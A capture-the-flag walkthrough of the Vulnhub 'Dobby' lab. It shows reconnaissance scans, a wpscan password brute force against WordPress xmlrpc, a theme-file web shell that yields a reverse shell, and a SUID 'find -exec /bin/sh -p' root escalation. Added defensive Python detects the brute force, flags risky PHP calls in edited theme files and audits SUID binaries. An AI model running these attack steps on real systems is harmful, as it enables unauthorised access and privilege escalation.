Vulnhub Dobby Detailed Walkthrough (A Different Way to Obtain the WordPress Admin Password)
Dobby
Author: jason_huawen
Target Machine Information
Name: Hogwarts: Dobby
Address:
Identifying the Target Host's IP Address
┌──(kali㉿kali)-[~/Vulnhub/Dobby]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: Finished! | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:9f:49:9e 1 60 PCS Systemtechnik GmbH
192.168.56.207 08:00:27:a4:96:64 1 60 PCS Systemtechnik GmbH
Using the netdiscover tool that ships with Kali Linux, the target host's IP address is identified as 192.168.56.207.
NMAP Scan
┌──(kali㉿kali)-[~/Vulnhub/Dobby]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.207 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-15 06:21 EST
Nmap scan report for 192.168.56.207
Host is up (0.00015s latency).
Not shown: 65534 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.46 ((Ubuntu))
|_http-title: Draco:dG9vIGVhc3kgbm8/IFBvdHRlcg==
|_http-server-header: Apache/2.4.46 (Ubuntu)
MAC Address: 08:00:27:A4:96:64 (Oracle VirtualBox virtual NIC)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.37 seconds
┌──(kali㉿kali)-[~/Vulnhub/Dobby]
└─$ echo 'dG9vIGVhc3kgbm8/IFBvdHRlcg==' | base64 -d
too easy no? Potter
Is Potter a username?
Getting a Shell
Visiting port 80, the source of the returned page contains a comment:
<!--
See: /alohomora
-->
┌──(kali㉿kali)-[~/Vulnhub/Dobby]
└─$ curl http://192.168.56.207/alohomora/
Draco's password is his house ;)
Is Draco a username? And the password is his house?
┌──(kali㉿kali)-[~/Vulnhub/Dobby]
└─$ nikto -h http://192.168.56.207
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.207
+ Target Hostname: 192.168.56.207
+ Target Port: 80
+ Start Time: 2023-01-15 06:25:39 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.46 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: 2ae1, size: 5b3957e06e486, mtime: gzip
+ Allowed HTTP Methods: POST, OPTIONS, HEAD, GET
+ /phpinfo.php: Output from the phpinfo() function was found.
+ OSVDB-3233: /phpinfo.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information.
+ 7915 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time: 2023-01-15 06:26:31 (GMT-5) (52 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
*********************************************************************
Portions of the server's headers (Apache/2.4.46) are not in
the Nikto 2.1.6 database or are newer than the known string. Would you like
to submit this information (*no server specific data*) to CIRT.net
for a Nikto update (or you may email to sullo@cirt.net) (y/n)? n
┌──(kali㉿kali)-[~/Vulnhub/Dobby]
└─$ gobuster dir -u http://192.168.56.207 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.207
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Timeout: 10s
===============================================================
2023/01/15 06:27:12 Starting gobuster in directory enumeration mode
===============================================================
/log (Status: 200) [Size: 45]
/server-status (Status: 403) [Size: 279]
Progress: 218329 / 220561 (98.99%)
===============================================================
2023/01/15 06:27:38 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/Dobby]
└─$ curl http://192.168.56.207/log
pass:OjppbGlrZXNvY2tz
hint --> /DiagonAlley
/DiagonAlley is a WordPress site.
There is a post that is Brainfuck-encoded:
+++++ +++++ [->++ +++++ +++<] >.<++ +[->+ ++<]> ++.<+ ++[-> —<] >—-
..<++ ++[-> ++++< ]>+++ ++++. <++++ [->– –<]> .<+++ [->++ +<]>+ .<+++ +[->- —<] >–.< ++++[ ->+++ +<]>+ +++.- -.<++ +[->- –<]> —– .<+++ [->++ +<]>+ +++.<
After decoding:
donn��������
Which user's password is the one above?
Logging into the WordPress admin panel with draco and the password above does not succeed. Strange!!!
┌──(kali㉿kali)-[~]
└─$ echo 'OjppbGlrZXNvY2tz' | base64 -d
::ilikesocks
It turns out the password the author provided is base64-encoded.
┌──(kali㉿kali)-[~/Vulnhub/Dobby]
└─$ wpscan --url http://192.168.56.207/DiagonAlley/ -e u,p
_______________________________________________________________
WordPress Security Scanner by the WPScan Team
Version 3.8.22
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]
[+] URL: http://192.168.56.207/DiagonAlley/ [192.168.56.207]
[+] Started: Sun Jan 15 06:37:04 2023
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.46 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://192.168.56.207/DiagonAlley/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://192.168.56.207/DiagonAlley/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://192.168.56.207/DiagonAlley/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://192.168.56.207/DiagonAlley/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.5.3 identified (Insecure, released on 2020-10-30).
| Found By: Rss Generator (Passive Detection)
| - http://192.168.56.207/DiagonAlley/index.php/feed/, <generator>https://wordpress.org/?v=5.5.3</generator>
| - http://192.168.56.207/DiagonAlley/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.5.3</generator>
[+] WordPress theme in use: amphibious
| Location: http://192.168.56.207/DiagonAlley/wp-content/themes/amphibious/
| Latest Version: 1.0.1 (up to date)
| Last Updated: 2020-04-15T00:00:00.000Z
| Readme: http://192.168.56.207/DiagonAlley/wp-content/themes/amphibious/readme.txt
| Style URL: http://192.168.56.207/DiagonAlley/wp-content/themes/amphibious/style.css?ver=5.5.3
| Style Name: Amphibious
| Style URI: https://templatepocket.com/free-wordpress-theme/amphibious-responsive-blog-wordpress-theme/
| Description: Amphibious is an elegant magazine, personal, blog WordPress theme. Amphibious has a clean, modern an...
| Author: TemplatePocket
| Author URI: https://templatepocket.com
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.0.1 (80% confidence)
| Found By: Style (Passive Detection)
| - http://192.168.56.207/DiagonAlley/wp-content/themes/amphibious/style.css?ver=5.5.3, Match: 'Version: 1.0.1'
[+] Enumerating Most Popular Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <===============================================> (10 / 10) 100.00% Time: 00:00:00
[i] User(s) Identified:
[+] draco
| Found By: Author Posts - Author Pattern (Passive Detection)
| Confirmed By:
| Wp Json Api (Aggressive Detection)
| - http://192.168.56.207/DiagonAlley/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
[+] Draco
| Found By: Rss Generator (Passive Detection)
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Sun Jan 15 06:37:07 2023
[+] Requests Done: 54
[+] Cached Requests: 6
[+] Data Sent: 15.186 KB
[+] Data Received: 303.258 KB
[+] Memory used: 233.68 MB
[+] Elapsed time: 00:00:03
┌──(kali㉿kali)-[~/Vulnhub/Dobby]
└─$ wpscan --url http://192.168.56.207/DiagonAlley/ -U draco -P /usr/share/wordlists/rockyou.txt
_______________________________________________________________
WordPress Security Scanner by the WPScan Team
Version 3.8.22
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]
[+] URL: http://192.168.56.207/DiagonAlley/ [192.168.56.207]
[+] Started: Sun Jan 15 06:40:08 2023
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.46 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://192.168.56.207/DiagonAlley/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://192.168.56.207/DiagonAlley/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://192.168.56.207/DiagonAlley/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://192.168.56.207/DiagonAlley/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.5.3 identified (Insecure, released on 2020-10-30).
| Found By: Rss Generator (Passive Detection)
| - http://192.168.56.207/DiagonAlley/index.php/feed/, <generator>https://wordpress.org/?v=5.5.3</generator>
| - http://192.168.56.207/DiagonAlley/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.5.3</generator>
[+] WordPress theme in use: amphibious
| Location: http://192.168.56.207/DiagonAlley/wp-content/themes/amphibious/
| Latest Version: 1.0.1 (up to date)
| Last Updated: 2020-04-15T00:00:00.000Z
| Readme: http://192.168.56.207/DiagonAlley/wp-content/themes/amphibious/readme.txt
| Style URL: http://192.168.56.207/DiagonAlley/wp-content/themes/amphibious/style.css?ver=5.5.3
| Style Name: Amphibious
| Style URI: https://templatepocket.com/free-wordpress-theme/amphibious-responsive-blog-wordpress-theme/
| Description: Amphibious is an elegant magazine, personal, blog WordPress theme. Amphibious has a clean, modern an...
| Author: TemplatePocket
| Author URI: https://templatepocket.com
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.0.1 (80% confidence)
| Found By: Style (Passive Detection)
| - http://192.168.56.207/DiagonAlley/wp-content/themes/amphibious/style.css?ver=5.5.3, Match: 'Version: 1.0.1'
[+] Enumerating All Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:00 <==============================================> (137 / 137) 100.00% Time: 00:00:00
[i] No Config Backups Found.
[+] Performing password attack on Xmlrpc against 1 user/s
[SUCCESS] - draco / slytherin
Trying draco / slytherin Time: 00:04:10 < > (14930 / 14359322) 0.10% ETA: ??:??:??
[!] Valid Combinations Found:
| Username: draco, Password: slytherin
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Sun Jan 15 06:44:24 2023
[+] Requests Done: 15070
[+] Cached Requests: 37
[+] Data Sent: 8.042 MB
[+] Data Received: 8.99 MB
[+] Memory used: 292.348 MB
[+] Elapsed time: 00:04:15
Successfully cracked draco's password: slytherin
Next, log in to the WordPress admin backend and, under Appearance -> Editor, edit 404.php, replacing its contents with the shell.php code.
The location of 404.php can be found by viewing the source of the WordPress site's home page:
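From the defender's side, the wpscan run above issued roughly fifteen thousand POSTs to xmlrpc.php in about four minutes, which stands out clearly in the web server's access log. The following added example (not from the original post) flags clients whose POST rate to xmlrpc.php exceeds a threshold inside a sliding window; the log lines, IP addresses and user agent strings it uses are constructed sample data.

```python
# Added example (not from the original post): spot a WordPress XML-RPC
# password-guessing run, such as the wpscan attack above, in Apache access logs.
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta, timezone

# Apache "combined" format: ip - - [time] "METHOD path HTTP/x" status size "ref" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line: str):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    rec["status"] = int(rec["status"])
    return rec


def detect_xmlrpc_bruteforce(lines, threshold: int = 20, window_s: int = 60) -> dict:
    """Return {ip: peak_count} for clients whose POSTs to xmlrpc.php exceed
    `threshold` inside any sliding window of `window_s` seconds. Each client's
    lines must be in chronological order, as they are in an access log."""
    recent = defaultdict(deque)   # ip -> timestamps of its POSTs inside the window
    alerts = {}
    for line in lines:
        rec = parse_line(line)
        if not rec or rec["method"] != "POST" or not rec["path"].endswith("/xmlrpc.php"):
            continue
        q = recent[rec["ip"]]
        q.append(rec["ts"])
        while (rec["ts"] - q[0]).total_seconds() > window_s:
            q.popleft()
        if len(q) > threshold:
            alerts[rec["ip"]] = max(alerts.get(rec["ip"], 0), len(q))
    return alerts


def sample_log() -> list:
    """Constructed sample (not real log data): one scanner-like client sending
    25 POSTs in 25 seconds, one plugin-style client with 3 POSTs, one page view."""
    base = datetime(2023, 1, 15, 11, 40, 8, tzinfo=timezone.utc)
    ua = "WPScan v3.8.22 (https://wpscan.com/wordpress-security-scanner)"
    lines = []
    for i in range(25):
        t = (base + timedelta(seconds=i)).strftime(TS_FMT)
        lines.append(f'192.168.56.206 - - [{t}] "POST /DiagonAlley/xmlrpc.php HTTP/1.1" 200 403 "-" "{ua}"')
    for i in range(3):
        t = (base + timedelta(seconds=30 * i)).strftime(TS_FMT)
        lines.append(f'192.168.56.50 - - [{t}] "POST /DiagonAlley/xmlrpc.php HTTP/1.1" 200 403 "-" "Jetpack"')
    t = base.strftime(TS_FMT)
    lines.append(f'192.168.56.51 - - [{t}] "GET /DiagonAlley/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"')
    return lines


if __name__ == "__main__":
    print(detect_xmlrpc_bruteforce(sample_log()))  # {'192.168.56.206': 25}
```

Disabling XML-RPC where nothing needs it, or rate-limiting POSTs to xmlrpc.php at the web server, removes the authentication path that wpscan used here.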
http://192.168.56.207/DiagonAlley/wp-content/themes/amphibious/404.php
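Editing a theme template through the admin editor, as done here with 404.php, leaves the file's hash changed, which a simple integrity check catches. The following added example (not from the original post) hashes a theme directory, diffs it against a baseline, and lists risky PHP calls in any changed or new file; the theme files and the modified 404.php it creates are a constructed fixture in a temporary directory.

```python
# Added example (not from the original post): a file-integrity check for a theme
# directory, which catches edits such as replacing 404.php through the theme editor.
import hashlib
import os
import re
import tempfile

# PHP calls a theme template has no business making; their presence in a changed
# file is what a responder looks at first. Constructed, non-exhaustive list.
RISKY_CALLS = ("system", "exec", "shell_exec", "passthru", "popen", "proc_open", "eval", "fsockopen")
RISKY_RE = re.compile(r"\b(" + "|".join(RISKY_CALLS) + r")\s*\(")


def hash_tree(root: str) -> dict:
    """Map each file under `root` (path relative to root) to its SHA-256 digest."""
    digests = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            h = hashlib.sha256()
            with open(full, "rb") as f:
                for chunk in iter(lambda: f.read(65536), b""):
                    h.update(chunk)
            digests[os.path.relpath(full, root)] = h.hexdigest()
    return digests


def diff_trees(baseline: dict, current: dict) -> dict:
    """Classify files as modified, added or removed relative to the baseline."""
    return {
        "modified": sorted(p for p in baseline if p in current and baseline[p] != current[p]),
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
    }


def risky_calls(path: str) -> list:
    """Return the distinct risky PHP function names found in a file."""
    with open(path, "r", errors="replace") as f:
        return sorted(set(RISKY_RE.findall(f.read())))


def demo() -> dict:
    """Constructed scenario: baseline a tiny theme, then overwrite 404.php and add a file."""
    root = tempfile.mkdtemp()
    for name, body in (("404.php", "<?php get_header(); ?>\n<h1>Not found</h1>\n"),
                       ("style.css", "/* Theme Name: demo */\n"),
                       ("index.php", "<?php get_template_part('content'); ?>\n")):
        with open(os.path.join(root, name), "w") as f:
            f.write(body)
    baseline = hash_tree(root)
    with open(os.path.join(root, "404.php"), "w") as f:
        f.write("<?php system($cmd); ?>\n")        # constructed stand-in for an injected shell
    with open(os.path.join(root, "wp-extra.php"), "w") as f:
        f.write("<?php echo 'x'; ?>\n")
    report = diff_trees(baseline, hash_tree(root))
    report["risky"] = {p: risky_calls(os.path.join(root, p)) for p in report["modified"] + report["added"]}
    return report


if __name__ == "__main__":
    print(demo())
```

Setting DISALLOW_FILE_EDIT in wp-config.php removes the theme editor entirely, so a stolen admin password no longer translates directly into code execution.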
On Kali Linux, the reverse shell from the target host is received successfully:
┌──(kali㉿kali)-[~/Vulnhub/Dobby]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.207] 34256
Linux HogWarts 5.8.0-26-generic #27-Ubuntu SMP Wed Oct 21 22:29:16 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
13:37:52 up 1:18, 0 users, load average: 0.03, 0.05, 0.05
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$
www-data@HogWarts:/home/dobby$ ls -alh
ls -alh
total 92K
drwxr-xr-x 16 dobby dobby 4.0K Nov 7 2020 .
drwxr-xr-x 3 root root 4.0K Nov 7 2020 ..
-rw------- 1 dobby dobby 1.9K Nov 8 2020 .bash_history
-rw-r--r-- 1 dobby dobby 220 Nov 7 2020 .bash_logout
-rw-r--r-- 1 dobby dobby 3.7K Nov 7 2020 .bashrc
drwx------ 15 dobby dobby 4.0K Nov 7 2020 .cache
drwxr-xr-x 12 dobby dobby 4.0K Nov 7 2020 .config
drwx------ 3 dobby dobby 4.0K Nov 8 2020 .gnupg
drwxr-xr-x 3 dobby dobby 4.0K Nov 7 2020 .local
drwx------ 5 dobby dobby 4.0K Nov 7 2020 .mozilla
-rw------- 1 dobby dobby 313 Nov 7 2020 .mysql_history
-rw-r--r-- 1 dobby dobby 807 Nov 7 2020 .profile
drwx------ 2 dobby dobby 4.0K Nov 7 2020 .ssh
-rw-r--r-- 1 dobby dobby 0 Nov 7 2020 .sudo_as_admin_successful
drwxr-xr-x 3 dobby dobby 4.0K Nov 8 2020 Descargas
drwxr-xr-x 2 dobby dobby 4.0K Nov 7 2020 Documentos
drwxr-xr-x 2 dobby dobby 4.0K Nov 8 2020 Escritorio
drwxr-xr-x 2 dobby dobby 4.0K Nov 7 2020 Imágenes
drwxr-xr-x 2 dobby dobby 4.0K Nov 7 2020 Música
drwxr-xr-x 2 dobby dobby 4.0K Nov 7 2020 Plantillas
drwxr-xr-x 2 dobby dobby 4.0K Nov 7 2020 Público
drwxr-xr-x 2 dobby dobby 4.0K Nov 7 2020 Vídeos
-rw-rw-r-- 1 dobby dobby 106 Nov 7 2020 flag1.txt
-r--r----- 1 root root 755 Nov 7 2020 sudoers
www-data@HogWarts:/home/dobby$ cat flag1.txt
cat flag1.txt
Command 'cat' not found, but can be installed with:
apt install coreutils
Please ask your administrator.
www-data@HogWarts:/home/dobby$ more flag1.txt
more flag1.txt
"Harry potter this year should not go to the school of wizardry"
flag1{28327a4964cb391d74111a185a5047ad}
Although the target host has no cat command, the more command can be used to read the first flag.
Privilege Escalation
Upload the linpeas.sh script to the /tmp directory on the target host, make it executable, and run it. The relevant part of the output is:
═════════════════════════════════════════╣ Interesting Files ╠═════════════════════════════════════════
╚═══════════════════╝
╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid
strings Not Found
-rwsr-xr-x 1 root root 109K Oct 8 2020 /snap/snapd/9721/usr/lib/snapd/snap-confine ---> Ubuntu_snapd<2.37_dirty_sock_Local_Privilege_Escalation(CVE-2019-7304)
-rwsr-xr-x 1 root root 43K Mar 5 2020 /snap/core18/1885/bin/mount ---> Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-xr-x 1 root root 63K Jun 28 2019 /snap/core18/1885/bin/ping
-rwsr-xr-x 1 root root 44K Mar 22 2019 /snap/core18/1885/bin/su
-rwsr-xr-x 1 root root 27K Mar 5 2020 /snap/core18/1885/bin/umount ---> BSD/Linux(08-1996)
-rwsr-xr-x 1 root root 75K Mar 22 2019 /snap/core18/1885/usr/bin/chfn ---> SuSE_9.3/10
-rwsr-xr-x 1 root root 44K Mar 22 2019 /snap/core18/1885/usr/bin/chsh
-rwsr-xr-x 1 root root 75K Mar 22 2019 /snap/core18/1885/usr/bin/gpasswd
-rwsr-xr-x 1 root root 40K Mar 22 2019 /snap/core18/1885/usr/bin/newgrp ---> HP-UX_10.20
-rwsr-xr-x 1 root root 59K Mar 22 2019 /snap/core18/1885/usr/bin/passwd ---> Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
-rwsr-xr-x 1 root root 146K Jan 31 2020 /snap/core18/1885/usr/bin/sudo ---> check_if_the_sudo_version_is_vulnerable
-rwsr-xr-- 1 root systemd-network 42K Jun 11 2020 /snap/core18/1885/usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 427K Mar 4 2019 /snap/core18/1885/usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 43K Sep 16 2020 /snap/core18/1932/bin/mount ---> Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-xr-x 1 root root 63K Jun 28 2019 /snap/core18/1932/bin/ping
-rwsr-xr-x 1 root root 44K Mar 22 2019 /snap/core18/1932/bin/su
-rwsr-xr-x 1 root root 27K Sep 16 2020 /snap/core18/1932/bin/umount ---> BSD/Linux(08-1996)
-rwsr-xr-x 1 root root 75K Mar 22 2019 /snap/core18/1932/usr/bin/chfn ---> SuSE_9.3/10
-rwsr-xr-x 1 root root 44K Mar 22 2019 /snap/core18/1932/usr/bin/chsh
-rwsr-xr-x 1 root root 75K Mar 22 2019 /snap/core18/1932/usr/bin/gpasswd
-rwsr-xr-x 1 root root 40K Mar 22 2019 /snap/core18/1932/usr/bin/newgrp ---> HP-UX_10.20
-rwsr-xr-x 1 root root 59K Mar 22 2019 /snap/core18/1932/usr/bin/passwd ---> Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
-rwsr-xr-x 1 root root 146K Jan 31 2020 /snap/core18/1932/usr/bin/sudo ---> check_if_the_sudo_version_is_vulnerable
-rwsr-xr-- 1 root systemd-network 42K Jun 11 2020 /snap/core18/1932/usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 427K Mar 4 2019 /snap/core18/1932/usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 23K Aug 3 2020 /usr/libexec/polkit-agent-helper-1
-rwsr-xr-- 1 root sssd 92K Oct 6 2020 /usr/libexec/sssd/ldap_child (Unknown SUID binary)
-rwsr-xr-- 1 root sssd 83K Oct 6 2020 /usr/libexec/sssd/p11_child (Unknown SUID binary)
-rwsr-xr-- 1 root sssd 168K Oct 6 2020 /usr/libexec/sssd/krb5_child (Unknown SUID binary)
-rwsr-xr-- 1 root sssd 31K Oct 6 2020 /usr/libexec/sssd/proxy_child (Unknown SUID binary)
-rwsr-xr-- 1 root sssd 56K Oct 6 2020 /usr/libexec/sssd/selinux_child (Unknown SUID binary)
-rwsr-xr-- 1 root dip 386K Jul 23 2020 /usr/sbin/pppd ---> Apple_Mac_OSX_10.4.8(05-2007)
-rwsr-xr-x 1 root root 15K Sep 29 2020 /usr/bin/vmware-user-suid-wrapper
-rwsr-xr-x 1 root root 71K Aug 30 2020 /usr/bin/su
-rwsr-xr-x 1 root root 67K May 28 2020 /usr/bin/passwd ---> Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
-rwsr-xr-x 1 root root 179K Jul 8 2020 /usr/bin/sudo ---> check_if_the_sudo_version_is_vulnerable
-rwsr-xr-x 1 root root 84K May 28 2020 /usr/bin/chfn ---> SuSE_9.3/10
-rwsr-xr-x 1 root root 47K Jul 24 2020 /usr/bin/base32
-rwsr-xr-x 1 root root 87K May 28 2020 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 313K Sep 30 2020 /usr/bin/find
-rwsr-xr-x 1 root root 31K Aug 3 2020 /usr/bin/pkexec ---> Linux4.10_to_5.1.17(CVE-2019-13272)/rhel_6(CVE-2011-1485)
-rwsr-xr-x 1 root root 52K May 28 2020 /usr/bin/chsh
-rwsr-xr-x 1 root root 55K Aug 30 2020 /usr/bin/mount ---> Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-xr-x 1 root root 39K Aug 30 2020 /usr/bin/umount ---> BSD/Linux(08-1996)
-rwsr-xr-x 1 root root 44K May 28 2020 /usr/bin/newgrp ---> HP-UX_10.20
-rwsr-xr-x 1 root root 39K Mar 7 2020 /usr/bin/fusermount
-rwsr-xr-x 1 root root 467K Jun 7 2020 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 131K Oct 19 2020 /usr/lib/snapd/snap-confine ---> Ubuntu_snapd<2.37_dirty_sock_Local_Privilege_Escalation(CVE-2019-7304)
-rwsr-xr-- 1 root messagebus 51K Sep 10 2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-sr-x 1 root root 15K Oct 7 2020 /usr/lib/xorg/Xorg.wrap
The SUID bit on the find or base32 command can be used for privilege escalation.
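The linpeas listing above is read by eye for binaries that should never be set-uid, such as find and base32. The following added example (not from the original post) does the same audit programmatically: it walks the given directories, collects set-uid files, and flags those whose basename is not on an allowlist of binaries that are normally set-uid root on Ubuntu; the allowlist is a constructed minimal one, and the fixture creates three set-uid files owned by the current user in a temporary directory.

```python
# Added example (not from the original post): audit set-uid binaries the way the
# linpeas listing above is read by hand, flagging any not on an expected list.
import os
import stat
import tempfile

# Basenames of set-uid root binaries normally present on an Ubuntu 20.04 install.
# Constructed, minimal allowlist: build the real one from a known-good image.
EXPECTED_SUID = {
    "su", "sudo", "passwd", "chfn", "chsh", "gpasswd", "newgrp", "mount", "umount",
    "pkexec", "fusermount", "ssh-keysign", "dbus-daemon-launch-helper", "snap-confine",
    "ping", "polkit-agent-helper-1", "Xorg.wrap", "pppd",
}


def find_suid(roots) -> list:
    """Return (path, owner_uid) for every regular file with the set-uid bit under `roots`."""
    found = []
    for root in roots:
        for dirpath, _, files in os.walk(root):
            for name in files:
                path = os.path.join(dirpath, name)
                try:
                    st = os.lstat(path)      # lstat: do not follow symlinks
                except OSError:
                    continue
                if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                    found.append((path, st.st_uid))
    return found


def unexpected_suid(roots, owner_uid: int = 0) -> list:
    """Set-uid files owned by `owner_uid` whose basename is not on the allowlist.
    On the machine above this would report /usr/bin/find and /usr/bin/base32."""
    return sorted(
        path for path, uid in find_suid(roots)
        if uid == owner_uid and os.path.basename(path) not in EXPECTED_SUID
    )


def demo() -> list:
    """Constructed fixture: a temp dir with three set-uid files owned by the current user."""
    root = tempfile.mkdtemp()
    for name in ("find", "base32", "passwd"):
        path = os.path.join(root, name)
        with open(path, "w") as f:
            f.write("#!/bin/sh\nexit 0\n")
        os.chmod(path, 0o4755)               # set-uid on a file you own needs no root
    flagged = unexpected_suid([root], owner_uid=os.getuid())
    return [os.path.basename(p) for p in flagged]


if __name__ == "__main__":
    print(demo())   # ['base32', 'find']
```

Run it against /usr, /bin, /sbin and /snap with the default owner_uid of 0 to audit a real host; anything it reports deserves either a documented reason or a chmod u-s.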
www-data@HogWarts:/tmp$ /usr/bin/find . -exec /bin/sh -p \; -quit
